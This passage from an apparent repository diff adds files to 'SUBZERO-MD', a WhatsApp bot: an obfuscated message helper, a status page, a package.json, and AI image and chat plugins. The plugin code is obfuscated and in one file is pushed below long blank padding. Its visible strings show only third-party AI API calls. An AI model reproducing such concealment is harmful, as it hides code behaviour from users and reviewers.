x13d477[_0x5baaf2(0xf8)](_0x1453f4[_0x5baaf2(0x128)],{'delete':_0x1453f4['quoted'][_0x5baaf2(0x110)][_0x5baaf2(0x122)]}),_0x1453f4[_0x5baaf2(0x10b)][_0x5baaf2(0xf4)]=_0x197eee=>_0x13d477['sendMessage'](_0x1453f4[_0x5baaf2(0x128)],{'react':{'text':_0x197eee,'key':_0x1453f4['quoted'][_0x5baaf2(0x110)]['key']}});}}_0x1453f4[_0x5baaf2(0xeb)]=_0x5ca008=>downloadMediaMessage(_0x1453f4,_0x5ca008);}return _0x1453f4[_0x5baaf2(0x101)]=(_0x41cb42,_0x5bcc2f=_0x1453f4[_0x5baaf2(0x128)],_0x28068e={'mentions':[_0x1453f4['sender']]})=>_0x13d477[_0x5baaf2(0xf8)](_0x5bcc2f,{'text':_0x41cb42,'contextInfo':{'mentionedJid':_0x28068e[_0x5baaf2(0x104)]}},{'quoted':_0x1453f4}),_0x1453f4['replyS']=(_0x29ab83,_0x359a69=_0x1453f4[_0x5baaf2(0x128)],_0x3fabd3={'mentions':[_0x1453f4['sender']]})=>_0x13d477[_0x5baaf2(0xf8)](_0x359a69,{'sticker':_0x29ab83,'contextInfo':{'mentionedJid':_0x3fabd3[_0x5baaf2(0x104)]}},{'quoted':_0x1453f4}),_0x1453f4[_0x5baaf2(0xe9)]=(_0x17fe45,_0x2218f1,_0x20080a=_0x1453f4[_0x5baaf2(0x128)],_0x515d88={'mentions':[_0x1453f4[_0x5baaf2(0x118)]]})=>_0x13d477['sendMessage'](_0x20080a,{'image':_0x17fe45,'caption':_0x2218f1,'contextInfo':{'mentionedJid':_0x515d88[_0x5baaf2(0x104)]}},{'quoted':_0x1453f4}),_0x1453f4['replyVid']=(_0x1606d7,_0x1591fa,_0x3a7dc8=_0x1453f4[_0x5baaf2(0x128)],_0x9e0ecd={'mentions':[_0x1453f4['sender']],'gif':![]})=>_0x13d477['sendMessage'](_0x3a7dc8,{'video':_0x1606d7,'caption':_0x1591fa,'gifPlayback':_0x9e0ecd[_0x5baaf2(0xe7)],'contextInfo':{'mentionedJid':_0x9e0ecd[_0x5baaf2(0x104)]}},{'quoted':_0x1453f4}),_0x1453f4['replyAud']=(_0x16a4b3,_0x21e7b4=_0x1453f4[_0x5baaf2(0x128)],_0x4ca5fb={'mentions':[_0x1453f4[_0x5baaf2(0x118)]],'ptt':![]})=>_0x13d477[_0x5baaf2(0xf8)](_0x21e7b4,{'audio':_0x16a4b3,'ptt':_0x4ca5fb['ptt'],'mimetype':'audio/mpeg','contextInfo':{'mentionedJid':_0x4ca5fb['mentions']}},{'quoted':_0x1453f4}),_0x1453f4['replyDoc']=(_0x5f5568,_0x1402e9=_0x1453f4[_0x5baaf2(0x128)],_0x29eb4b={'mentions':[_0x1453f4[_0x5baaf2(0x118)]],'filename':_0x5baaf2(0xfe),'mimetype':_0x5baaf2(0x125)})=>_0x13d477[_0x5baaf2(0xf8)](_0x1402e9,{'document':_0x5f5568,'mimetype':_0x29eb4b[_0x5baaf2(0xe0)],'fileName':_0x29eb4b[_0x5baaf2(0x10f)],'contextInfo':{'mentionedJid':_0x29eb4b[_0x5baaf2(0x104)]}},{'quoted':_0x1453f4}),_0x1453f4[_0x5baaf2(0xe2)]=(_0x2e1d11,_0x1e632c,_0x15a6f7)=>{const _0x3d411e=_0x5baaf2;var _0x34d64d=_0x3d411e(0x112)+_0x3d411e(0x106)+'FN:'+_0x2e1d11+'\x0a'+_0x3d411e(0x109)+_0x1e632c+';\x0a'+_0x3d411e(0x107)+_0x15a6f7+':+'+_0x15a6f7+'\x0a'+_0x3d411e(0xea);_0x13d477[_0x3d411e(0xf8)](_0x1453f4[_0x3d411e(0x128)],{'contacts':{'displayName':_0x2e1d11,'contacts':[{'vcard':_0x34d64d}]}},{'quoted':_0x1453f4});},_0x1453f4[_0x5baaf2(0xf4)]=_0xb119e6=>_0x13d477[_0x5baaf2(0xf8)](_0x1453f4[_0x5baaf2(0x128)],{'react':{'text':_0xb119e6,'key':_0x1453f4[_0x5baaf2(0x122)]}}),_0x1453f4;};module[_0x5a9488(0x103)]={'sms':sms,'downloadMediaMessage':downloadMediaMessage};function _0x1538(){const _0x725068=['isGroup','.mp3','caption','viewOnceMessage','concat','2271609mlvrcB','stanzaId','react','string','undefined.webp','readFileSync','sendMessage','split','buttonsResponseMessage','text','from','msg','undefined.pdf','replace','videoMessage','reply','extendedTextMessage','exports','mentions','contextInfo','VERSION:3.0\x0a','TEL;type=CELL;type=VOICE;waid=','remoteJid','ORG:','mentionedJid','quoted','audio','user','selectedId','filename','fakeObj','undefined.mp4','BEGIN:VCARD\x0a','WebMessageInfo','documentMessage','.jpg','2fHSAin','selectedButtonId','sender','participant','mentionUser','body','imageMessage','6HmFlso','3444eMnRIs','1626035HSbDjS','endsWith','type','key','conversation','document','application/pdf','jpeg','undefined.jpg','chat','8LBxctO','@g.us','writeFileSync','toLowerCase','fromObject','1058701mbklvm','.mp4','268tOOkmA','undefined.mp3','28501ACvDXh','@whiskeysockets/baileys','jpg','4211400ARGXdD','message','227914ytkwLe','mimetype','delete','replyContact','20505AKceVL','fileName','filter','m4a','gif','fromMe','replyImg','END:VCARD','download','video'];_0x1538=function(){return _0x725068;};return _0x1538();}
|
lib/subzero.html
ADDED
@@ -0,0 +1,179 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<!DOCTYPE html>
|
2 |
+
<html lang="en">
|
3 |
+
<head>
|
4 |
+
<meta charset="UTF-8">
|
5 |
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
6 |
+
<title>Encrypto27 BOT STATUS</title>
|
7 |
+
<style>
|
8 |
+
/* Body Styling */
|
9 |
+
body {
|
10 |
+
font-family: 'Arial', sans-serif;
|
11 |
+
margin: 0;
|
12 |
+
padding: 0;
|
13 |
+
display: flex;
|
14 |
+
justify-content: center;
|
15 |
+
align-items: center;
|
16 |
+
height: 100vh;
|
17 |
+
background: linear-gradient(90deg, #004e92, #000428);
|
18 |
+
background-size: 400% 400%;
|
19 |
+
animation: gradientAnimation 10s infinite alternate;
|
20 |
+
overflow: hidden;
|
21 |
+
position: relative;
|
22 |
+
}
|
23 |
+
|
24 |
+
@keyframes gradientAnimation {
|
25 |
+
0% { background-position: 0% 50%; }
|
26 |
+
100% { background-position: 100% 50%; }
|
27 |
+
}
|
28 |
+
|
29 |
+
/* Snowflake Styling */
|
30 |
+
.snowflake {
|
31 |
+
position: absolute;
|
32 |
+
top: -10px;
|
33 |
+
color: #fff;
|
34 |
+
font-size: 16px;
|
35 |
+
opacity: 0.8;
|
36 |
+
animation: fall 10s linear infinite, sway 2s ease-in-out infinite alternate;
|
37 |
+
}
|
38 |
+
|
39 |
+
@keyframes fall {
|
40 |
+
0% { transform: translateY(-10px); opacity: 0; }
|
41 |
+
50% { opacity: 1; }
|
42 |
+
100% { transform: translateY(100vh); }
|
43 |
+
}
|
44 |
+
|
45 |
+
@keyframes sway {
|
46 |
+
0% { transform: translateX(0); }
|
47 |
+
100% { transform: translateX(20px); }
|
48 |
+
}
|
49 |
+
|
50 |
+
/* Central Box */
|
51 |
+
.container {
|
52 |
+
text-align: center;
|
53 |
+
padding: 30px;
|
54 |
+
background: rgba(0, 0, 0, 0.7);
|
55 |
+
border-radius: 15px;
|
56 |
+
box-shadow: 0 10px 30px rgba(0, 0, 0, 0.5);
|
57 |
+
width: 80%;
|
58 |
+
max-width: 600px;
|
59 |
+
z-index: 2;
|
60 |
+
animation: fadeIn 2s ease-in-out;
|
61 |
+
}
|
62 |
+
|
63 |
+
@keyframes fadeIn {
|
64 |
+
0% { opacity: 0; transform: scale(0.8); }
|
65 |
+
100% { opacity: 1; transform: scale(1); }
|
66 |
+
}
|
67 |
+
|
68 |
+
/* Title Styling with Heartbeat Animation */
|
69 |
+
.title {
|
70 |
+
font-size: 48px;
|
71 |
+
font-weight: bold;
|
72 |
+
text-transform: uppercase;
|
73 |
+
color: #b3ecff;
|
74 |
+
text-shadow: 0 0 15px #b3ecff, 0 0 30px #80dfff, 0 0 45px #4db8ff;
|
75 |
+
animation: heartbeat 1.5s infinite, glow 3s infinite alternate;
|
76 |
+
}
|
77 |
+
|
78 |
+
@keyframes heartbeat {
|
79 |
+
0%, 100% { transform: scale(1); }
|
80 |
+
25% { transform: scale(1.1); }
|
81 |
+
50% { transform: scale(0.95); }
|
82 |
+
75% { transform: scale(1.05); }
|
83 |
+
}
|
84 |
+
|
85 |
+
@keyframes glow {
|
86 |
+
0% { text-shadow: 0 0 15px #b3ecff; }
|
87 |
+
100% { text-shadow: 0 0 25px #66c2ff, 0 0 50px #e6f7ff; }
|
88 |
+
}
|
89 |
+
|
90 |
+
/* Running Text */
|
91 |
+
.marquee {
|
92 |
+
margin-top: 20px;
|
93 |
+
overflow: hidden;
|
94 |
+
white-space: nowrap;
|
95 |
+
box-sizing: border-box;
|
96 |
+
}
|
97 |
+
|
98 |
+
.marquee span {
|
99 |
+
display: inline-block;
|
100 |
+
font-size: 22px;
|
101 |
+
color: #b3ecff;
|
102 |
+
text-shadow: 0 0 10px rgba(255, 255, 255, 0.8);
|
103 |
+
animation: marqueeAnimation 12s linear infinite;
|
104 |
+
}
|
105 |
+
|
106 |
+
@keyframes marqueeAnimation {
|
107 |
+
0% { transform: translateX(100%); }
|
108 |
+
100% { transform: translateX(-100%); }
|
109 |
+
}
|
110 |
+
|
111 |
+
/* Button Styling */
|
112 |
+
.action-btn {
|
113 |
+
display: inline-block;
|
114 |
+
margin-top: 20px;
|
115 |
+
padding: 10px 25px;
|
116 |
+
font-size: 18px;
|
117 |
+
color: #b3ecff;
|
118 |
+
text-transform: uppercase;
|
119 |
+
text-decoration: none;
|
120 |
+
border: 2px solid #b3ecff;
|
121 |
+
border-radius: 5px;
|
122 |
+
transition: 0.3s;
|
123 |
+
background: transparent;
|
124 |
+
position: relative;
|
125 |
+
z-index: 2;
|
126 |
+
}
|
127 |
+
|
128 |
+
.action-btn:hover {
|
129 |
+
background: #b3ecff;
|
130 |
+
color: #004e92;
|
131 |
+
cursor: pointer;
|
132 |
+
}
|
133 |
+
</style>
|
134 |
+
</head>
|
135 |
+
<body>
|
136 |
+
<!-- Snowflakes -->
|
137 |
+
<div class="snowflake" style="left: 10%; animation-delay: 0s;">❄</div>
|
138 |
+
<div class="snowflake" style="left: 20%; animation-delay: 1s;">❅</div>
|
139 |
+
<div class="snowflake" style="left: 30%; animation-delay: 2s;">❆</div>
|
140 |
+
<div class="snowflake" style="left: 40%; animation-delay: 3s;">❄</div>
|
141 |
+
<div class="snowflake" style="left: 50%; animation-delay: 4s;">❅</div>
|
142 |
+
<div class="snowflake" style="left: 60%; animation-delay: 5s;">❆</div>
|
143 |
+
<div class="snowflake" style="left: 70%; animation-delay: 6s;">❄</div>
|
144 |
+
<div class="snowflake" style="left: 80%; animation-delay: 7s;">❅</div>
|
145 |
+
<div class="snowflake" style="left: 90%; animation-delay: 8s;">❆</div>
|
146 |
+
|
147 |
+
<div class="container">
|
148 |
+
<!-- Status Title -->
|
149 |
+
<div class="title">Encrypto27 Bot Online</div>
|
150 |
+
|
151 |
+
<!-- Running Text -->
|
152 |
+
<div class="marquee">
|
153 |
+
<span>
|
154 |
+
Encrypto27 Bot is online! | Reliable, Fast, and Efficient | Always here to help! | Stay ahead with E-27 AI Bot!
|
155 |
+
</span>
|
156 |
+
</div>
|
157 |
+
|
158 |
+
<!-- Action Button -->
|
159 |
+
<a href="https://wa.me/27679291800?text=I+have+Deployed" class="action-btn"><h3 id="version"></h3></a>
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
</div>
|
166 |
+
</body>
|
167 |
+
<script>
|
168 |
+
fetch('https://raw.githubusercontent.com/mrfrank-ofc/SUBZERO-MD/master/package.json')
|
169 |
+
.then(response => response.json())
|
170 |
+
.then(data => {
|
171 |
+
const version = data.version;
|
172 |
+
document.getElementById('version').textContent = `Version: ${version}`;
|
173 |
+
})
|
174 |
+
.catch(error => {
|
175 |
+
console.error('Error fetching version:', error);
|
176 |
+
document.getElementById('version').textContent = 'Version 2.0';
|
177 |
+
});
|
178 |
+
</script>
|
179 |
+
</html>
|
package.json
ADDED
@@ -0,0 +1,48 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"name": "SUBZERO-MD",
|
3 |
+
"version": "1.0.5",
|
4 |
+
"description": "THE BEST BOT IN THE UNIVERSE",
|
5 |
+
"main": "index.js",
|
6 |
+
"scripts": {
|
7 |
+
"start": "pm2 start index.js --deep-monitoring --attach --name SUBZERO-MD",
|
8 |
+
"stop": "pm2 stop SUBZERO-MD",
|
9 |
+
"restart": "pm2 restart SUBZERO-MD"
|
10 |
+
},
|
11 |
+
"dependencies": {
|
12 |
+
"@whiskeysockets/baileys": "6.6.0",
|
13 |
+
"@adiwajshing/keyed-db": "^0.2.4",
|
14 |
+
"@dark-yasiya/yt-dl.js": "1.0.5",
|
15 |
+
"pino": "^7.0.5",
|
16 |
+
"pm2": "^5.2.0",
|
17 |
+
"util": "^0.12.4",
|
18 |
+
"express": "latest",
|
19 |
+
"axios": "^1.2.5",
|
20 |
+
"crypto-digest-sync": "^1.0.0",
|
21 |
+
"crypto-js": "latest",
|
22 |
+
"file_size_url": "1.0.4",
|
23 |
+
"fs-extra": "^11.1.0",
|
24 |
+
"fs": "^0.0.1-security",
|
25 |
+
"ffmpeg": "^0.0.4",
|
26 |
+
"file-type": "^16.5.3",
|
27 |
+
"fluent-ffmpeg": "^2.1.2",
|
28 |
+
"form-data": "^4.0.0",
|
29 |
+
"google-tts-api": "^2.0.2",
|
30 |
+
"path": "^0.12.7",
|
31 |
+
"node-fetch": "^2.6.1",
|
32 |
+
"btch-downloader": "^2.2.9",
|
33 |
+
"megajs": "^1.1.0",
|
34 |
+
"wa_set_pkg": "1.0.5",
|
35 |
+
"wa-sticker-formatter": "^4.4.4",
|
36 |
+
"path": "^0.12.7",
|
37 |
+
"vm": "^0.1.0",
|
38 |
+
"cheerio": "^1.0.0-rc.12",
|
39 |
+
"ruhend-scraper" : "8.0.3",
|
40 |
+
"qrcode-terminal": "^0.12.0",
|
41 |
+
"wikipedia":"2.1.2",
|
42 |
+
"yt-search":"2.11.1",
|
43 |
+
"api-dylux":"1.8.5",
|
44 |
+
"@mrnima/tiktok-downloader":"1.0.0",
|
45 |
+
"@mrnima/facebook-downloader":"1.0.0",
|
46 |
+
"mrnima-moviedl":"1.0.0"
|
47 |
+
}
|
48 |
+
}
|
plugins/Readme.md
ADDED
@@ -0,0 +1 @@
|
|
|
|
|
1 |
+
© SUBZERO MD W.A BOT ❄️
|
plugins/SUBZERO.js
ADDED
@@ -0,0 +1,16 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
plugins/ai-flux.js
ADDED
@@ -0,0 +1,6 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
|
2 |
+
// Fuck You Bro
|
3 |
+
// Mr Frank
|
4 |
+
|
5 |
+
|
6 |
+
function _0x407d(_0xd4dafe,_0x20c36c){const _0x3090d8=_0x3090();return _0x407d=function(_0x407d25,_0x58bf74){_0x407d25=_0x407d25-0x11f;let _0xb2a3b=_0x3090d8[_0x407d25];return _0xb2a3b;},_0x407d(_0xd4dafe,_0x20c36c);}const _0x8b6ff0=_0x407d;(function(_0x230d7c,_0x3fd2e1){const _0x353e01=_0x407d,_0x1bd52f=_0x230d7c();while(!![]){try{const _0x555a9e=-parseInt(_0x353e01(0x134))/0x1+-parseInt(_0x353e01(0x121))/0x2+parseInt(_0x353e01(0x135))/0x3+parseInt(_0x353e01(0x129))/0x4+parseInt(_0x353e01(0x12f))/0x5+-parseInt(_0x353e01(0x123))/0x6*(-parseInt(_0x353e01(0x120))/0x7)+-parseInt(_0x353e01(0x12e))/0x8;if(_0x555a9e===_0x3fd2e1)break;else _0x1bd52f['push'](_0x1bd52f['shift']());}catch(_0x1a219e){_0x1bd52f['push'](_0x1bd52f['shift']());}}}(_0x3090,0x2b63e));function _0x3090(){const _0x305c9d=['Please\x20provide\x20a\x20prompt\x20for\x20the\x20image.','Generate\x20an\x20image\x20using\x20AI.','../command','imagine','170113RfgMbR','617766paCsxv','https://api.giftedtech.web.id/api/ai/fluximg?apikey=gifted&prompt=','118615agaNls','587328ikfQyz','Generated\x20by\x20Subzero','78pfchGn','result','flux','../config','>\x20*Subzero\x20Brewing\x20Your\x20image...✨*','sendMessage','1273520JNeqGW','log','../lib/functions','An\x20error\x20occurred:\x20','Hello\x20World!','1997848pfEUZk','733235HFKdul'];_0x3090=function(){return _0x305c9d;};return _0x3090();}function hi(){const _0x42b5f9=_0x407d;console[_0x42b5f9(0x12a)](_0x42b5f9(0x12d));}hi();const config=require(_0x8b6ff0(0x126)),{cmd,commands}=require(_0x8b6ff0(0x132)),{fetchJson}=require(_0x8b6ff0(0x12b));cmd({'pattern':_0x8b6ff0(0x125),'alias':['sd',_0x8b6ff0(0x133)],'react':'🪄','desc':_0x8b6ff0(0x131),'category':'main','filename':__filename},async(_0x45375f,_0x116ed6,_0x50f8ed,{from:_0x362e57,quoted:_0x19982b,body:_0xf5ee0c,isCmd:_0x5663cf,command:_0x8a2223,args:_0x13257b,q:_0xf673b0,isGroup:_0x41b9b4,sender:_0xc5dcb0,senderNumber:_0x58604b,botNumber2:_0x4299ef,botNumber:_0x5c3f14,pushname:_0x1669dd,isMe:_0x42fb5b,isOwner:_0x1b81de,groupMetadata:_0x730bba,groupName:_0x1e41f3,participants:_0x914703,groupAdmins:_0x3461c8,isBotAdmins:_0x2b6506,isAdmins:_0x383355,reply:_0x16ec35})=>{const _0x440b20=_0x8b6ff0;try{if(!_0xf673b0)return _0x16ec35(_0x440b20(0x130));await _0x16ec35(_0x440b20(0x127));let _0x2b0917=await fetchJson(_0x440b20(0x11f)+_0xf673b0);const _0x2351b1=_0x2b0917[_0x440b20(0x124)];await _0x45375f[_0x440b20(0x128)](_0x50f8ed['chat'],{'image':{'url':_0x2351b1,'caption':_0x440b20(0x122)}});}catch(_0x38a8f1){console['error'](_0x38a8f1),_0x16ec35(_0x440b20(0x12c)+_0x38a8f1['message']);}});
|
plugins/ai-models.js
ADDED
@@ -0,0 +1,207 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
|
2 |
+
/*
|
3 |
+
|
4 |
+
$$$$$$\ $$\
|
5 |
+
$$ __$$\ $$ |
|
6 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
7 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
8 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
9 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
10 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
11 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
12 |
+
|
13 |
+
Project Name : SubZero MD
|
14 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
15 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
16 |
+
Support : wa.me/18062212660
|
17 |
+
*/
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
const _0x2ab262=_0xfadd;(function(_0x4e4176,_0x961203){const _0x21c28b=_0xfadd,_0x23a021=_0x4e4176();while(!![]){try{const _0x152f78=-parseInt(_0x21c28b(0x1e0))/0x1*(-parseInt(_0x21c28b(0x1e4))/0x2)+-parseInt(_0x21c28b(0x1dd))/0x3+-parseInt(_0x21c28b(0x1ee))/0x4+-parseInt(_0x21c28b(0x1fd))/0x5+parseInt(_0x21c28b(0x1f2))/0x6*(parseInt(_0x21c28b(0x1e3))/0x7)+-parseInt(_0x21c28b(0x1e8))/0x8+parseInt(_0x21c28b(0x1de))/0x9*(parseInt(_0x21c28b(0x1ed))/0xa);if(_0x152f78===_0x961203)break;else _0x23a021['push'](_0x23a021['shift']());}catch(_0x3efbda){_0x23a021['push'](_0x23a021['shift']());}}}(_0x5f21,0xda0d3));function hi(){const _0x4463dd=_0xfadd;console['log'](_0x4463dd(0x1fe));}hi();function _0xfadd(_0x29e107,_0x146ebf){const _0x5f214d=_0x5f21();return _0xfadd=function(_0xfadd45,_0xf6ba2e){_0xfadd45=_0xfadd45-0x1d9;let _0x25d1d3=_0x5f214d[_0xfadd45];return _0x25d1d3;},_0xfadd(_0x29e107,_0x146ebf);}function _0x5f21(){const _0x1db131=['llama3','zimai','21YAHRsO','124jQQrnt','../config','../command','main','5136512wTCigE','https://api.davidcyriltech.my.id/ai/gpt3?text=','llama2','mistraai','\x20`🤖\x20SUBZERO\x20CHATGPT\x203:`\x20\x0a\x0a','2862220FSRAzu','4869016uLfgKA','\x20`🤖\x20SUBZERO\x20GOOGLE\x20AI:`\x20\x0a\x0a','gpt3','\x20`🤖\x20SUBZERO\x20MISTRA\x20AI:`\x20\x0a\x0a','1163346CZaGgD','message','mistra','log','Please\x20ask\x20a\x20question\x20or\x20provide\x20input\x20for\x20the\x20AI.','metai','error','https://api.davidcyriltech.my.id/ai/gpt4omini?text=','No\x20response\x20from\x20the\x20AI.','subzero','https://api.davidcyriltech.my.id/ai/llama3?text=','8041150cQFudX','Hello\x20World!','gptturbo','gemini','chatgpt3','chatgpt','model3','An\x20error\x20occurred:\x20','../lib/functions','AI\x20chat.','llama','\x20`🤖\x20SUBZERO\x20CHATGPT\x204o:`\x20\x0a\x0a','1187052FmTKgj','90mIbWAO','meta','21169LvHQHg'];_0x5f21=function(){return _0x1db131;};return _0x5f21();}const 